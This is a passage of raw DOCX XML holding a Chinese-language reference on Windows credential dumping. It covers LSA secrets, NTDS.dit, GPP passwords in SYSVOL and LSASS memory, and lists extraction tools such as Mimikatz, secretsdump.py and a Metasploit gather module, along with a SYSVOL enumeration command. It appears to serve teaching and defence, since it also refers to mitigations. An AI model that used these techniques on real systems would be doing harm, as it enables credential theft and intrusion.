      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PBKDF2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到的</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3D8779" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B331A9" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LSA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Secrets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29830706" w14:textId="4D95542C" w:rsidR="000F2665" w:rsidRPr="00426915" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00426915">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以系统</w:t>
      </w:r>
      <w:r w:rsidRPr="00426915">
        <w:t>权限访问主机</w:t>
      </w:r>
      <w:r w:rsidRPr="00426915">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时</w:t>
      </w:r>
      <w:r w:rsidRPr="00426915">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00426915">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本地</w:t>
      </w:r>
      <w:r w:rsidRPr="00426915">
        <w:t>账号到域账号的</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r w:rsidRPr="00426915">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通常</w:t>
      </w:r>
      <w:r w:rsidRPr="00426915">
        <w:t>都可以用来访问</w:t>
      </w:r>
      <w:r w:rsidRPr="00426915">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LSA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00426915">
        <w:t>secrets</w:t>
      </w:r>
      <w:r w:rsidRPr="00426915">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00426915">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LS</w:t>
      </w:r>
      <w:r w:rsidRPr="00426915">
        <w:t>A secrets</w:t>
      </w:r>
      <w:r w:rsidRPr="00426915">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存储在注册表中。</w:t>
      </w:r>
      <w:r w:rsidRPr="00426915">
        <w:t>服务运行在</w:t>
      </w:r>
      <w:r w:rsidRPr="00426915">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本地或域用户的上下文中时，他们的密码存储在注册表中。如果启用了自动登录功能，则此信息也存储在注册表中。可以使用多种工具通过内存技术来检索</w:t>
      </w:r>
      <w:r w:rsidRPr="00426915">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SAM</w:t>
      </w:r>
      <w:r w:rsidRPr="00426915">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件，</w:t>
      </w:r>
      <w:r w:rsidRPr="00426915">
        <w:t>包括：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B13165" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="002D5E77" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="002D5E77">
        <w:t>pwdumpx.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C0BCB9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="002D5E77" w:rsidRDefault="00CC5590" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:hyperlink r:id="rId126" w:history="1">
        <w:r w:rsidR="000F2665" w:rsidRPr="002D5E77">
          <w:rPr>
            <w:rStyle w:val="af4"/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>gsecdump</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3714AE32" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="002D5E77" w:rsidRDefault="00CC5590" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:hyperlink r:id="rId127" w:history="1">
        <w:r w:rsidR="000F2665" w:rsidRPr="002D5E77">
          <w:rPr>
            <w:rStyle w:val="af4"/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>Mimikatz</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2F6B755B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="002D5E77" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="002D5E77">
        <w:t>secretsdump.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4881EF96" w14:textId="2B845776" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者，可以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>reg.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从注册表中提取文件，使用</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Creddump7</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收集</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD12AEE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00426915">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>注意</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>机制提取的密码是</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UTF-16</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编码的，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也就是说</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>它们</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以明文形式返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的。</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows 10</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新增了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LSA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>secrets</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的保护</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>具体参见</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓解</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6268B357" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B331A9" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来自域控制器的</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NTDS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B50A5D" w14:textId="42BE4904" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>活动</w:t>
      </w:r>
      <w:r>
        <w:t>目录</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存储域成员（包括设备和用户）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用于</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>验证</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和定义访问权限。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>活动目录</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>域数据库存储在</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NTDS.dit</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件中。默认情况下，</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NTDS</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件位于域控制器的</w:t>
      </w:r>
      <w:r>
        <w:t>%SystemRoot%\NTDS\Ntds.dit</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5B71FE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下列工具和技术可用于枚举</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NTDS</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件和整个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>活动目录</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>哈希的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内容</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6830FFCD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="002D5E77" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="002D5E77">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>卷影复制</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD25648" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="002D5E77" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="002D5E77">
        <w:t>secretsdump.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3244D6D5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="002D5E77" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="002D5E77">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="002D5E77">
        <w:t>indows</w:t>
      </w:r>
      <w:r w:rsidRPr="002D5E77">
        <w:t>内置工具</w:t>
      </w:r>
      <w:r w:rsidRPr="002D5E77">
        <w:t>ntdsutil.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F27895" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="002D5E77" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="002D5E77">
        <w:t>Invoke-NinjaCopy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12089F62" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B331A9" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GPP</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD72F5E" w14:textId="48AF630A" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>组策略首选项（</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GPP</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>允许管理员</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:r w:rsidR="008424FF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内置的</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r>
        <w:t>来创建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>域策略</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。这些策略</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>除其他</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>特殊</w:t>
      </w:r>
      <w:r>
        <w:t>情况</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>外，允许管理员设置本地</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>账号</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D410EE7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这些组策略存储在域控制器上的</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SYSVOL</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，这意味着任何域用户都可以查看</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SYSVOL</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>共享并解密密码（</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AES</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>私钥已在线泄漏</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E5812C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以下工具和脚本可用于从组策略首选项</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收集和解密密码文件：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069932E1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>攻击后模块</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>"post/windows/gather/credentials/gpp"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E419690" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r>
        <w:t>Get-GPPPassword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7539EE52" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r>
        <w:t>gpprefdecrypt.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A78C217" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="007D60CC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>注意</w:t>
      </w:r>
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：在</w:t>
      </w:r>
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SYSVOL</w:t>
      </w:r>
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>共享上，可用</w:t>
      </w:r>
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dir / s * .xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令来</w:t>
      </w:r>
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>枚举</w:t>
      </w:r>
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BAC167" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B331A9" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务主要</w:t>
      </w:r>
      <w:r>
        <w:t>名称</w:t>
      </w:r>
      <w:r w:rsidRPr="00B331A9">
        <w:t xml:space="preserve"> (SPNs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389A461D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="002D5E77" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="002D5E77">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参见</w:t>
      </w:r>
      <w:r w:rsidRPr="002D5E77">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kerberos</w:t>
      </w:r>
      <w:r w:rsidRPr="002D5E77">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>活动目录攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11809B22" w14:textId="79FE1325" w:rsidR="000F2665" w:rsidRPr="00B331A9" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>明文</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCC1D9A" w14:textId="037F5E25" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户登录到系统后，将生成各种</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并将其存储在内存中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全机构</w:t>
      </w:r>
      <w:r>
        <w:t>子系统服务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LSASS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程中。管理用户或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
